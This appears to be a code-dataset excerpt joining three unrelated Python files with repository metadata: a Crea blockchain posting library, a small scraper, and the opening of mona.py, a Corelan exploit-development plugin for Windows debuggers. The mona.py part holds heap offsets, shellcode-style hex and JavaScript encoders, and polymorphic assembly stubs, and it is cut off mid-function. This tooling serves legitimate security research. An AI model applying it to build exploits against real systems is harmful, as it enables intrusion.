users = get_users(body)
hashtags = get_hashtags(body)
users = list(set(users).difference(set([author])))
if len(users) > 0:
json_metadata.update({"users": users})
if len(image) > 0:
json_metadata.update({"image": image})
if len(links) > 0:
json_metadata.update({"links": links})
if len(tags) < 5:
for i in range(5 - len(tags)):
if len(hashtags) > i:
tags.append(hashtags[i])
if tags:
# first tag should be a category
category = tags[0]
json_metadata.update({"tags": tags})
# can't provide a category while replying to a post
if reply_identifier and category:
category = None
# deal with replies/categories
if reply_identifier:
parent_author, parent_permlink = resolve_authorperm(
reply_identifier)
if not permlink:
permlink = derive_permlink(title, parent_permlink)
elif category:
parent_permlink = derive_permlink(category)
parent_author = ""
if not permlink:
permlink = derive_permlink(title)
else:
parent_author = ""
parent_permlink = ""
if not permlink:
permlink = derive_permlink(title)
post_op = operations.Comment(
**{
"parent_author": parent_author,
"parent_permlink": parent_permlink,
"author": account["name"],
"permlink": permlink,
"title": title,
"body": body,
"json_metadata": json_metadata
})
ops = [post_op]
# if comment_options are used, add a new op to the transaction
if comment_options or beneficiaries:
comment_op = self._build_comment_options_op(account['name'],
permlink,
comment_options,
beneficiaries)
ops.append(comment_op)
if self_vote:
vote_op = operations.Vote(
**{
'voter': account["name"],
'author': account["name"],
'permlink': permlink,
'weight': CREA_100_PERCENT,
})
ops.append(vote_op)
return self.finalizeOp(ops, account, "posting", **kwargs)
def comment_options(self, options, identifier, beneficiaries=[],
account=None, **kwargs):
""" Set the comment options
:param dict options: The options to define.
:param str identifier: Post identifier
:param list beneficiaries: (optional) list of beneficiaries
:param str account: (optional) the account to allow access
to (defaults to ``default_account``)
For the options, you have these defaults:::
{
"author": "",
"permlink": "",
"max_accepted_payout": "1000000.000 CBD",
"percent_crea_dollars": 10000,
"allow_votes": True,
"allow_curation_rewards": True,
}
"""
if not account and config["default_account"]:
account = config["default_account"]
if not account:
raise ValueError("You need to provide an account")
account = Account(account, crea_instance=self)
author, permlink = resolve_authorperm(identifier)
op = self._build_comment_options_op(author, permlink, options,
beneficiaries)
return self.finalizeOp(op, account, "posting", **kwargs)
def _build_comment_options_op(self, author, permlink, options,
beneficiaries):
options = remove_from_dict(options or {}, [
'max_accepted_payout', 'percent_crea_dollars',
'allow_votes', 'allow_curation_rewards', 'extensions'
], keep_keys=True)
# override beneficiaries extension
if beneficiaries:
# validate schema
# or just simply vo.Schema([{'account': str, 'weight': int}])
weight_sum = 0
for b in beneficiaries:
if 'account' not in b:
raise ValueError(
"beneficiaries need an account field!"
)
if 'weight' not in b:
b['weight'] = CREA_100_PERCENT
if len(b['account']) > 16:
raise ValueError(
"beneficiaries error, account name length >16!"
)
if b['weight'] < 1 or b['weight'] > CREA_100_PERCENT:
raise ValueError(
"beneficiaries error, 1<=weight<=%s!" %
(CREA_100_PERCENT)
)
weight_sum += b['weight']
if weight_sum > CREA_100_PERCENT:
raise ValueError(
"beneficiaries exceed total weight limit %s" %
CREA_100_PERCENT
)
options['beneficiaries'] = beneficiaries
default_max_payout = "1000000.000 %s" % (self.sbd_symbol)
comment_op = operations.Comment_options(
**{
"author":
author,
"permlink":
permlink,
"max_accepted_payout":
options.get("max_accepted_payout", default_max_payout),
"percent_crea_dollars":
int(options.get("percent_crea_dollars", CREA_100_PERCENT)),
"allow_votes":
options.get("allow_votes", True),
"allow_curation_rewards":
options.get("allow_curation_rewards", True),
"extensions":
options.get("extensions", []),
"beneficiaries":
options.get("beneficiaries", []),
"prefix": self.prefix,
})
return comment_op
def get_api_methods(self):
"""Returns all supported api methods"""
return self.rpc.get_methods(api="jsonrpc")
def get_apis(self):
"""Returns all enabled apis"""
api_methods = self.get_api_methods()
api_list = []
for a in api_methods:
api = a.split(".")[0]
if api not in api_list:
api_list.append(api)
return api_list
def _get_asset_symbol(self, asset_id):
""" get the asset symbol from an asset id
:@param int asset_id: 0 -> CBD, 1 -> CREA, 2 -> VESTS
"""
for asset in self.chain_params['chain_assets']:
if asset['id'] == asset_id:
return asset['symbol']
raise KeyError("asset ID not found in chain assets")
@property
def sbd_symbol(self):
""" get the current chains symbol for CBD (e.g. "TBD" on testnet) """
# some networks (e.g. whaleshares) do not have CBD
try:
symbol = self._get_asset_symbol(0)
except KeyError:
symbol = self._get_asset_symbol(1)
return symbol
@property
def crea_symbol(self):
""" get the current chains symbol for CREA (e.g. "TESTS" on testnet) """
return self._get_asset_symbol(1)
@property
def vests_symbol(self):
""" get the current chains symbol for VESTS """
return self._get_asset_symbol(2)
| 42.341701 | 170 | 0.592794 | [
"MIT"
] | creativechain/crea-python-lib | crea/crea.py | 82,655 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
from lxml import html
import requests
page = requests.get('http://stmary-338.com/')
tree = html.fromstring(page.content)
info = tree.xpath('//*[@id="panel-w5840cbe2b571d-0-1-0"]/div/div/h6[1]')
for i in info:
print "ST MARY", i.encode(page.encoding)
| 28.636364 | 72 | 0.68254 | [
"MIT"
] | linuxkay/python | test-stmary.py | 315 | Python |
"""
U{Corelan<https://www.corelan.be>}
Copyright (c) 2011-2017, Peter Van Eeckhoutte - Corelan GCV
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Corelan nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL PETER VAN EECKHOUTTE OR CORELAN GCV BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
$Revision: 577 $
$Id: mona.py 577 2017-07-02 15:18:00Z corelanc0d3r $
"""
__VERSION__ = '2.0'
__REV__ = filter(str.isdigit, '$Revision: 577 $')
__IMM__ = '1.8'
__DEBUGGERAPP__ = ''
arch = 32
win7mode = False
S17_LOGFILE = 'C:\\monaLog.txt'
# try:
# import debugger
# except:
# pass
try:
import immlib as dbglib
from immlib import LogBpHook
__DEBUGGERAPP__ = "Immunity Debugger"
except:
try:
import pykd
import windbglib as dbglib
from windbglib import LogBpHook
dbglib.checkVersion()
arch = dbglib.getArchitecture()
__DEBUGGERAPP__ = "WinDBG"
except SystemExit, e:
print "-Exit."
import sys
sys.exit(e)
except Exception:
try:
import pykd
import x64dbgpylib as dbglib
from x64dbgpylib import LogBpHook
dbglib.checkVersion()
arch = dbglib.getArchitecture()
__DEBUGGERAPP__ = "x64dbg"
#import traceback
except Exception:
print "Do not run this script outside of a debugger !"
#print traceback.format_exc()
import sys
exit(1)
import getopt
try:
#import debugtypes
#import libdatatype
from immutils import *
except:
pass
import os
import re
import sys
import types
import random
import shutil
import struct
import string
import types
import urllib
import inspect
import datetime
import binascii
import itertools
import traceback
import pickle
import json
from operator import itemgetter
from collections import defaultdict, namedtuple
import cProfile
import pstats
import copy
DESC = "Corelan Team exploit development swiss army knife"
#---------------------------------------#
# Global stuff #
#---------------------------------------#
TOP_USERLAND = 0x7fffffff
g_modules={}
MemoryPageACL={}
global CritCache
global vtableCache
global stacklistCache
global segmentlistCache
global VACache
global NtGlobalFlag
global FreeListBitmap
global memProtConstants
global currentArgs
global disasmUpperChecked
global disasmIsUpper
global configFileCache
NtGlobalFlag = -1
FreeListBitmap = {}
memProtConstants = {}
CritCache={}
vtableCache={}
stacklistCache={}
segmentlistCache={}
configFileCache={}
VACache={}
ptr_counter = 0
ptr_to_get = -1
silent = False
ignoremodules = False
noheader = False
dbg = dbglib.Debugger()
disasmUpperChecked = False
disasmIsUpper = False
if __DEBUGGERAPP__ == "WinDBG":
if pykd.getSymbolPath().replace(" ","") == "":
dbg.log("")
dbg.log("** Warning, no symbol path set ! ** ",highlight=1)
sympath = "srv*c:\symbols*http://msdl.microsoft.com/download/symbols"
dbg.log(" I'll set the symbol path to %s" % sympath)
pykd.setSymbolPath(sympath)
dbg.log(" Symbol path set, now reloading symbols...")
dbg.nativeCommand(".reload")
dbg.log(" All set. Please restart WinDBG.")
dbg.log("")
osver = dbg.getOsVersion()
if osver in ["6", "7", "8", "vista", "win7", "2008server", "win8", "win8.1", "win10"]:
win7mode = True
heapgranularity = 8
if arch == 64:
heapgranularity = 16
offset_categories = ["xp", "vista", "win7", "win8", "win10"]
# offset = [x86,x64]
offsets = {
"FrontEndHeap" : {
"xp" : [0x580,0xad8],
"vista" : [0x0d4,0x178],
"win8" : [0x0d0,0x170],
"win10" : {
14393 : [0x0d4,0x178]
}
},
"FrontEndHeapType" : {
"xp" : [0x586,0xae2],
"vista" : [0x0da,0x182],
"win8" : [0x0d6,0x17a],
"win10" : {
14393 : [0x0da,0x182]
}
},
"VirtualAllocdBlocks" : {
"xp" : [0x050,0x090],
"vista" : [0x0a0,0x118],
"win8" : [0x09c,0x110]
},
"SegmentList" : {
"vista" : [0x0a8,0x128],
"win8" : [0x0a4,0x120]
}
}
#---------------------------------------#
# Populate constants #
#---------------------------------------#
memProtConstants["X"] = ["PAGE_EXECUTE",0x10]
memProtConstants["RX"] = ["PAGE_EXECUTE_READ",0x20]
memProtConstants["RWX"] = ["PAGE_EXECUTE_READWRITE",0x40]
memProtConstants["N"] = ["PAGE_NOACCESS",0x1]
memProtConstants["R"] = ["PAGE_READONLY",0x2]
memProtConstants["RW"] = ["PAGE_READWRITE",0x4]
memProtConstants["GUARD"] = ["PAGE_GUARD",0x100]
memProtConstants["NOCACHE"] = ["PAGE_NOCACHE",0x200]
memProtConstants["WC"] = ["PAGE_WRITECOMBINE",0x400]
#---------------------------------------#
# Utility functions #
#---------------------------------------#
def resetGlobals():
"""
Clears all global variables
"""
global CritCache
global vtableCache
global stacklistCache
global segmentlistCache
global VACache
global NtGlobalFlag
global FreeListBitmap
global memProtConstants
global currentArgs
CritCache = None
vtableCache = None
stacklistCache = None
segmentlistCache = None
VACache = None
NtGlobalFlag = None
FreeListBitmap = None
memProtConstants = None
currentArgs = None
disasmUpperChecked = False
return
def toHex(n):
"""
Converts a numeric value to hex (pointer to hex)
Arguments:
n - the value to convert
Return:
A string, representing the value in hex (8 characters long)
"""
if arch == 32:
return "%08x" % n
if arch == 64:
return "%016x" % n
def sanitize_module_name(modname):
"""
Sanitizes a module name so it can be used as a variable
"""
return modname.replace(".", "_")
def DwordToBits(srcDword):
"""
Converts a dword into an array of 32 bits
"""
bit_array = []
h_str = "%08x" % srcDword
h_size = len(h_str) * 4
bits = (bin(int(h_str,16))[2:]).zfill(h_size)[::-1]
for bit in bits:
bit_array.append(int(bit))
return bit_array
def getDisasmInstruction(disasmentry):
""" returns instruction string, checks if ASM is uppercase and converts to upper if needed """
instrline = disasmentry.getDisasm()
global disasmUpperChecked
global disasmIsUpper
if disasmUpperChecked:
if not disasmIsUpper:
instrline = instrline.upper()
else:
disasmUpperChecked = True
interim_instr = instrline.upper()
if interim_instr == instrline:
disasmIsUpper = True
else:
disasmIsUpper = False
dbg.log("** It looks like you've configured the debugger to produce lowercase disassembly. Got it, all good **", highlight=1)
instrline = instrline.upper()
return instrline
def multiSplit(thisarg,delimchars):
""" splits a string into an array, based on provided delimeters"""
splitparts = []
thispart = ""
for c in str(thisarg):
if c in delimchars:
thispart = thispart.replace(" ","")
if thispart != "":
splitparts.append(thispart)
splitparts.append(c)
thispart = ""
else:
thispart += c
if thispart != "":
splitparts.append(thispart)
return splitparts
def getAddyArg(argaddy):
"""
Tries to extract an address from a specified argument
addresses and values will be considered hex
(unless you specify 0n before a value)
registers are allowed too
"""
findaddy = 0
addyok = True
addyparts = []
addypartsint = []
delimchars = ["-","+","*","/","(",")","&","|",">","<"]
regs = dbg.getRegs()
thispart = ""
for c in str(argaddy):
if c in delimchars:
thispart = thispart.replace(" ","")
if thispart != "":
addyparts.append(thispart)
addyparts.append(c)
thispart = ""
else:
thispart += c
if thispart != "":
addyparts.append(thispart)
partok = False
for part in addyparts:
cleaned = part
if not part in delimchars:
for x in delimchars:
cleaned = cleaned.replace(x,"")
if cleaned.startswith("[") and cleaned.endswith("]"):
partval,partok = getIntForPart(cleaned.replace("[","").replace("]",""))
if partok:
try:
partval = struct.unpack('<L',dbg.readMemory(partval,4))[0]
except:
partval = 0
partok = False
break
else:
partval,partok = getIntForPart(cleaned)
if not partok:
break
addypartsint.append(partval)
else:
addypartsint.append(part)
if not partok:
break
if not partok:
addyok = False
findval = 0
else:
calcstr = "".join(str(x) for x in addypartsint)
try:
findval = eval(calcstr)
addyok = True
except:
findval = 0
addyok = False
return findval, addyok
def getIntForPart(part):
"""
Returns the int value associated with an input string
The input string can be a hex value, decimal value, register, modulename, or modulee!functionname
"""
partclean = part
partclean = partclean.upper()
addyok = True
partval = 0
regs = dbg.getRegs()
if partclean in regs:
partval = regs[partclean]
elif partclean.lower() == "heap" or partclean.lower() == "processheap":
partval = getDefaultProcessHeap()
else:
if partclean.lower().startswith("0n"):
partclean = partclean.lower().replace("0n","")
try:
partval = int(partclean)
except:
addyok = False
partval = 0
else:
try:
if not "0x" in partclean.lower():
partclean = "0x" + partclean
partval = int(partclean,16)
except:
addyok = False
partval = 0
if not addyok:
if not "!" in part:
m = getModuleObj(part)
if not m == None:
partval = m.moduleBase
addyok = True
else:
modparts = part.split("!")
modname = modparts[0]
funcname = modparts[1]
m = getFunctionAddress(modname,funcname)
if m > 0:
partval = m
addyok = True
return partval,addyok
def getFunctionAddress(modname,funcname):
"""
Returns the addres of the function inside a given module
Relies on EAT data
Returns 0 if nothing found
"""
funcaddy = 0
m = getModuleObj(modname)
if not m == None:
eatlist = m.getEAT()
for f in eatlist:
if funcname == eatlist[f]:
return f
for f in eatlist:
if funcname.lower() == eatlist[f].lower():
return f
return funcaddy
def getFunctionName(addy):
"""
Returns symbol name closest to the specified address
Only works in WinDBG
Returns function name and optional offset
"""
fname = ""
foffset = ""
cmd2run = "ln 0x%08x" % addy
output = dbg.nativeCommand(cmd2run)
for line in output.split("\n"):
if "|" in line:
lineparts = line.split(" ")
partcnt = 0
for p in lineparts:
if not p == "":
if partcnt == 1:
fname = p
break
partcnt += 1
if "+" in fname:
fnameparts = fname.split("+")
if len(fnameparts) > 1:
return fnameparts[0],fnameparts[1]
return fname,foffset
def printDataArray(data,charsperline=16,prefix=""):
maxlen = len(data)
charcnt = 0
charlinecnt = 0
linecnt = 0
thisline = prefix
lineprefix = "%04d - %04d " % (charcnt,charcnt+charsperline-1)
thisline += lineprefix
while charcnt < maxlen:
thisline += data[charcnt:charcnt+1]
charlinecnt += 1
charcnt += 1
if charlinecnt == charsperline or charlinecnt == maxlen:
dbg.log(thisline)
thisline = prefix
lineprefix = "%04d - %04d " % (charcnt,charcnt+charsperline-1)
thisline += lineprefix
charlinecnt = 0
return None
def find_all_copies(tofind,data):
"""
Finds all occurences of a string in a longer string
Arguments:
tofind - the string to find
data - contains the data to look for all occurences of 'tofind'
Return:
An array with all locations
"""
position = 0
positions = []
searchstringlen = len(tofind)
maxlen = len(data)
while position < maxlen:
position = data.find(tofind,position)
if position == -1:
break
positions.append(position)
position += searchstringlen
return positions
def getAllStringOffsets(data,minlen,offsetstart = 0):
asciistrings = {}
for match in re.finditer("(([\x20-\x7e]){%d,})" % minlen,data):
thisloc = match.start() + offsetstart
thisend = match.end() + offsetstart
asciistrings[thisloc] = thisend
return asciistrings
def getAllUnicodeStringOffsets(data,minlen,offsetstart = 0):
unicodestrings = {}
for match in re.finditer("((\x00[\x20-\x7e]){%d,})" % (minlen*2),data):
unicodestrings[offsetstart + match.start()] = (offsetstart + match.end())
return unicodestrings
def stripExtension(fullname):
"""
Removes extension from a filename
(will only remove the last extension)
Arguments :
fullname - the original string
Return:
A string, containing the original string without the last extension
"""
nameparts = fullname.split(".")
if len(nameparts) > 1:
cnt = 0
modname = ""
while cnt < len(nameparts)-1:
modname = modname + nameparts[cnt] + "."
cnt += 1
return modname.strip(".")
return fullname
def toHexByte(n):
"""
Converts a numeric value to a hex byte
Arguments:
n - the vale to convert (max 255)
Return:
A string, representing the value in hex (1 byte)
"""
return "%02X" % n
def toAsciiOnly(inputstr):
return "".join(i for i in inputstr if ord(i)<128 and ord(i) > 31)
def toAscii(n):
"""
Converts a byte to its ascii equivalent. Null byte = space
Arguments:
n - A string (2 chars) representing the byte to convert to ascii
Return:
A string (one character), representing the ascii equivalent
"""
asciiequival = " "
if n.__class__.__name__ == "int":
n = "%02x" % n
try:
if n != "00":
asciiequival=binascii.a2b_hex(n)
else:
asciiequival = " "
except TypeError:
asciiequival=" "
return asciiequival
def hex2bin(pattern):
"""
Converts a hex string (\\x??\\x??\\x??\\x??) to real hex bytes
Arguments:
pattern - A string representing the bytes to convert
Return:
the bytes
"""
pattern = pattern.replace("\\x", "")
pattern = pattern.replace("\"", "")
pattern = pattern.replace("\'", "")
return ''.join([binascii.a2b_hex(i+j) for i,j in zip(pattern[0::2],pattern[1::2])])
def getVariantType(typenr):
varianttypes = {}
varianttypes[0x0] = "VT_EMPTY"
varianttypes[0x1] = "VT_NULL"
varianttypes[0x2] = "VT_I2"
varianttypes[0x3] = "VT_I4"
varianttypes[0x4] = "VT_R4"
varianttypes[0x5] = "VT_R8"
varianttypes[0x6] = "VT_CY"
varianttypes[0x7] = "VT_DATE"
varianttypes[0x8] = "VT_BSTR"
varianttypes[0x9] = "VT_DISPATCH"
varianttypes[0xA] = "VT_ERROR"
varianttypes[0xB] = "VT_BOOL"
varianttypes[0xC] = "VT_VARIANT"
varianttypes[0xD] = "VT_UNKNOWN"
varianttypes[0xE] = "VT_DECIMAL"
varianttypes[0x10] = "VT_I1"
varianttypes[0x11] = "VT_UI1"
varianttypes[0x12] = "VT_UI2"
varianttypes[0x13] = "VT_UI4"
varianttypes[0x14] = "VT_I8"
varianttypes[0x15] = "VT_UI8"
varianttypes[0x16] = "VT_INT"
varianttypes[0x17] = "VT_UINT"
varianttypes[0x18] = "VT_VOID"
varianttypes[0x19] = "VT_HRESULT"
varianttypes[0x1A] = "VT_PTR"
varianttypes[0x1B] = "VT_SAFEARRAY"
varianttypes[0x1C] = "VT_CARRAY"
varianttypes[0x1D] = "VT_USERDEFINED"
varianttypes[0x1E] = "VT_LPSTR"
varianttypes[0x1F] = "VT_LPWSTR"
varianttypes[0x24] = "VT_RECORD"
varianttypes[0x25] = "VT_INT_PTR"
varianttypes[0x26] = "VT_UINT_PTR"
varianttypes[0x2000] = "VT_ARRAY"
varianttypes[0x4000] = "VT_BYREF"
if typenr in varianttypes:
return varianttypes[typenr]
else:
return ""
def bin2hex(binbytes):
"""
Converts a binary string to a string of space-separated hexadecimal bytes.
"""
return ' '.join('%02x' % ord(c) for c in binbytes)
def bin2hexstr(binbytes):
"""
Converts bytes to a string with hex
Arguments:
binbytes - the input to convert to hex
Return :
string with hex
"""
return ''.join('\\x%02x' % ord(c) for c in binbytes)
def str2js(inputstring):
"""
Converts a string to a javascript string
Arguments:
inputstring - the input string to convert
Return :
string in javascript format
"""
length = len(inputstring)
if length % 2 == 1:
jsmsg = "Warning : odd size given, js pattern will be truncated to " + str(length - 1) + " bytes, it's better use an even size\n"
if not silent:
dbg.logLines(jsmsg,highlight=1)
toreturn=""
for thismatch in re.compile("..").findall(inputstring):
thisunibyte = ""
for thisbyte in thismatch:
thisunibyte = "%02x" % ord(thisbyte) + thisunibyte
toreturn += "%u" + thisunibyte
return toreturn
def readJSONDict(filename):
"""
Retrieve stored dict from JSON file
"""
jsondict = {}
with open(filename, 'rb') as infile:
jsondata = infile.read()
jsondict = json.loads(jsondata)
return jsondict
def writeJSONDict(filename, dicttosave):
"""
Write dict as JSON to file
"""
with open(filename, 'wb') as outfile:
json.dump(dicttosave, outfile)
return
def readPickleDict(filename):
"""
Retrieve stored dict from file (pickle load)
"""
pdict = {}
pdict = pickle.load( open(filename,"rb"))
return pdict
def writePickleDict(filename, dicttosave):
"""
Write a dict to file as a pickle
"""
pickle.dump(dicttosave, open(filename, "wb"))
return
def opcodesToHex(opcodes):
"""
Converts pairs of chars (opcode bytes) to hex string notation
Arguments :
opcodes : pairs of chars
Return :
string with hex
"""
toreturn = []
opcodes = opcodes.replace(" ","")
for cnt in range(0, len(opcodes), 2):
thisbyte = opcodes[cnt:cnt+2]
toreturn.append("\\x" + thisbyte)
toreturn = ''.join(toreturn)
return toreturn
def rmLeading(input,toremove,toignore=""):
"""
Removes leading characters from an input string
Arguments:
input - the input string
toremove - the character to remove from the begin of the string
toignore - ignore this character
Return:
the input string without the leading character(s)
"""
newstring = ""
cnt = 0
while cnt < len(input):
if input[cnt] != toremove and input[cnt] != toignore:
break
cnt += 1
newstring = input[cnt:]
return newstring
def getVersionInfo(filename):
"""Retrieves version and revision numbers from a mona file
Arguments : filename
Return :
version - string with version (or empty if not found)
revision - string with revision (or empty if not found)
"""
file = open(filename,"rb")
content = file.readlines()
file.close()
revision = ""
version = ""
for line in content:
if line.startswith("$Revision"):
parts = line.split(" ")
if len(parts) > 1:
revision = parts[1].replace("$","")
if line.startswith("__VERSION__"):
parts = line.split("=")
if len(parts) > 1:
version = parts[1].strip()
return version,revision
def toniceHex(data,size):
"""
Converts a series of bytes into a hex string,
newline after 'size' nr of bytes
Arguments :
data - the bytes to convert
size - the number of bytes to show per linecache
Return :
a multiline string
"""
flip = 1
thisline = "\""
block = ""
for cnt in xrange(len(data)):
thisline += "\\x%s" % toHexByte(ord(data[cnt]))
if (flip == size) or (cnt == len(data)-1):
thisline += "\""
flip = 0
block += thisline
block += "\n"
thisline = "\""
cnt += 1
flip += 1
return block.lower()
def hexStrToInt(inputstr):
"""
Converts a string with hex bytes to a numeric value
Arguments:
inputstr - A string representing the bytes to convert. Example : 41414141
Return:
the numeric value
"""
valtoreturn = 0
try:
valtoreturn = int(inputstr, 16)
except:
valtoreturn = 0
return valtoreturn
def to_int(inputstr):
"""
Converts a string to int, whether it's hex or decimal
Arguments:
inputstr - A string representation of a number. Example: 0xFFFF, 2345
Return:
the numeric value
"""
if str(inputstr).lower().startswith("0x"):
return hexStrToInt(inputstr)
else:
return int(inputstr)
def toSize(toPad,size):
"""
Adds spaces to a string until the string reaches a certain length
Arguments:
input - A string
size - the destination size of the string
Return:
the expanded string of length <size>
"""
padded = toPad + " " * (size - len(toPad))
return padded.ljust(size," ")
def toUnicode(input):
"""
Converts a series of bytes to unicode (UTF-16) bytes
Arguments :
input - the source bytes
Return:
the unicode expanded version of the input
"""
unicodebytes = ""
# try/except, just in case .encode bails out
try:
unicodebytes = input.encode('UTF-16LE')
except:
inputlst = list(input)
for inputchar in inputlst:
unicodebytes += inputchar + '\x00'
return unicodebytes
def toJavaScript(input):
"""
Extracts pointers from lines of text
and returns a javascript friendly version
"""
alllines = input.split("\n")
javascriptversion = ""
allbytes = ""
for eachline in alllines:
thisline = eachline.replace("\t","").lower().strip()
if not(thisline.startswith("#")):
if thisline.startswith("0x"):
theptr = thisline.split(",")[0].replace("0x","")
# change order to unescape format
if arch == 32:
ptrstr = ""
byte1 = theptr[0] + theptr[1]
ptrstr = "\\x" + byte1
byte2 = theptr[2] + theptr[3]
ptrstr = "\\x" + byte2 + ptrstr
try:
byte3 = theptr[4] + theptr[5]
ptrstr = "\\x" + byte3 + ptrstr
except:
pass
try:
byte4 = theptr[6] + theptr[7]
ptrstr = "\\x" + byte4 + ptrstr
except:
pass
allbytes += hex2bin(ptrstr)
if arch == 64:
byte1 = theptr[0] + theptr[1]
byte2 = theptr[2] + theptr[3]
byte3 = theptr[4] + theptr[5]
byte4 = theptr[6] + theptr[7]
byte5 = theptr[8] + theptr[9]
byte6 = theptr[10] + theptr[11]
byte7 = theptr[12] + theptr[13]
byte8 = theptr[14] + theptr[15]
allbytes += hex2bin("\\x" + byte8 + "\\x" + byte7 + "\\x" + byte6 + "\\x" + byte5)
allbytes += hex2bin("\\x" + byte4 + "\\x" + byte3 + "\\x" + byte2 + "\\x" + byte1)
javascriptversion = str2js(allbytes)
return javascriptversion
def getSourceDest(instruction):
"""
Determines source and destination register for a given instruction
"""
src = []
dst = []
srcp = []
dstp = []
srco = []
dsto = []
instr = []
haveboth = False
seensep = False
seeninstr = False
regs = getAllRegs()
instructionparts = multiSplit(instruction,[" ",","])
if "," in instructionparts:
haveboth = True
delkeys = ["DWORD","PTR","BYTE"]
for d in delkeys:
if d in instructionparts:
instructionparts.remove(d)
for p in instructionparts:
regfound = False
for r in regs:
if r.upper() in p.upper() and not "!" in p and not len(instr) == 0:
regfound = True
seeninstr = True
break
if not regfound:
if not seeninstr and not seensep:
instr.append(p)
if "," in p:
seensep = True
else:
for r in regs:
if r.upper() in p.upper():
if not seensep or not haveboth:
dstp.append(p)
if not r in dsto:
dsto.append(r)
break
else:
srcp.append(p)
if not r in srco:
srco.append(r)
break
#dbg.log("dst: %s" % dsto)
#dbg.log("src: %s" % srco)
src = srcp
dst = dstp
return src,dst
def getAllRegs():
"""
Return an array with all 32bit, 16bit and 8bit registers
"""
regs = ["EAX","EBX","ECX","EDX","ESP","EBP","ESI","EDI","EIP"]
regs.append("AX")
regs.append("BX")
regs.append("CX")
regs.append("DX")
regs.append("BP")
regs.append("SP")
regs.append("SI")
regs.append("DI")
regs.append("AL")
regs.append("AH")
regs.append("BL")
regs.append("BH")
regs.append("CL")
regs.append("CH")
regs.append("DL")
regs.append("DH")
return regs
def getSmallerRegs(reg):
if reg == "EAX":
return ["AX","AL","AH"]
if reg == "AX":
return ["AL","AH"]
if reg == "EBX":
return ["BX","BL","BH"]
if reg == "BX":
return ["BL","BH"]
if reg == "ECX":
return ["CX","CL","CH"]
if reg == "CX":
return ["CL","CH"]
if reg == "EDX":
return ["DX","DL","DH"]
if reg == "DX":
return ["DL","DH"]
if reg == "ESP":
return ["SP"]
if reg == "EBP":
return ["BP"]
if reg == "ESI":
return ["SI"]
if reg == "EDI":
return ["DI"]
return []
def isReg(reg):
"""
Checks if a given string is a valid reg
Argument :
reg - the register to check
Return:
Boolean
"""
regs = []
if arch == 32:
regs=["eax","ebx","ecx","edx","esi","edi","ebp","esp"]
if arch == 64:
regs=["rax","rbx","rcx","rdx","rsi","rdi","rbp","rsp", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]
return str(reg).lower() in regs
def isAddress(string):
"""
Check if a string is an address / consists of hex chars only
Arguments:
string - the string to check
Return:
Boolean - True if the address string only contains hex bytes
"""
string = string.replace("\\x","")
if len(string) > 16:
return False
for char in string:
if char.upper() not in ["A","B","C","D","E","F","1","2","3","4","5","6","7","8","9","0"]:
return False
return True
def isHexValue(string):
"""
Check if a string is a hex value / consists of hex chars only (and - )
Arguments:
string - the string to check
Return:
Boolean - True if the address string only contains hex bytes or - sign
"""
string = string.replace("\\x","")
string = string.replace("0x","")
if len(string) > 16:
return False
for char in string:
if char.upper() not in ["A","B","C","D","E","F","1","2","3","4","5","6","7","8","9","0","-"]:
return False
return True
def Poly_ReturnDW(value):
I = random.randint(1, 3)
if I == 1:
if random.randint(1, 2) == 1:
return dbg.assemble( "SUB EAX, EAX\n ADD EAX, 0x%08x" % value )
else:
return dbg.assemble( "SUB EAX, EAX\n ADD EAX, -0x%08x" % value )
if I == 2:
return dbg.assemble( "PUSH 0x%08x\n POP EAX\n" % value )
if I == 3:
if random.randint(1, 2) == 1:
return dbg.assemble( "XCHG EAX, EDI\n DB 0xBF\n DD 0x%08x\n XCHG EAX, EDI" % value )
else:
return dbg.assemble( "XCHG EAX, EDI\n MOV EDI, 0x%08x\n XCHG EAX, EDI" % value )
return
def Poly_Return0():
I = random.randint(1, 4)
if I == 1:
return dbg.assemble( "SUB EAX, EAX" )
if I == 2:
if random.randint(1, 2) == 1:
return dbg.assemble( "PUSH 0\n POP EAX" )
else:
return dbg.assemble( "DB 0x6A, 0x00\n POP EAX" )
if I == 3:
return dbg.assemble( "XCHG EAX, EDI\n SUB EDI, EDI\n XCHG EAX, EDI" )
if I == 4:
return Poly_ReturnDW(0)
return
def addrToInt(string):
"""
Convert a textual address to an integer
Arguments:
string - the address
Return:
int - the address value
"""
string = string.replace("\\x","")
return hexStrToInt(string)
def splitAddress(address):
"""
Splits aa dword/qdword into individual bytes (4 or 8 bytes)
Arguments:
address - The string to split
Return:
4 or 8 bytes
"""
if arch == 32:
byte1 = address >> 24 & 0xFF
byte2 = address >> 16 & 0xFF
byte3 = address >> 8 & 0xFF
byte4 = address & 0xFF
return byte1,byte2,byte3,byte4
if arch == 64:
byte1 = address >> 56 & 0xFF
byte2 = address >> 48 & 0xFF
byte3 = address >> 40 & 0xFF
byte4 = address >> 32 & 0xFF
byte5 = address >> 24 & 0xFF
byte6 = address >> 16 & 0xFF
byte7 = address >> 8 & 0xFF
byte8 = address & 0xFF
return byte1,byte2,byte3,byte4,byte5,byte6,byte7,byte8
def bytesInRange(address, range):
"""
Checks if all bytes of an address are in a range
Arguments:
address - the address to check
range - a range object containing the values all bytes need to comply with
Return:
a boolean
"""
if arch == 32:
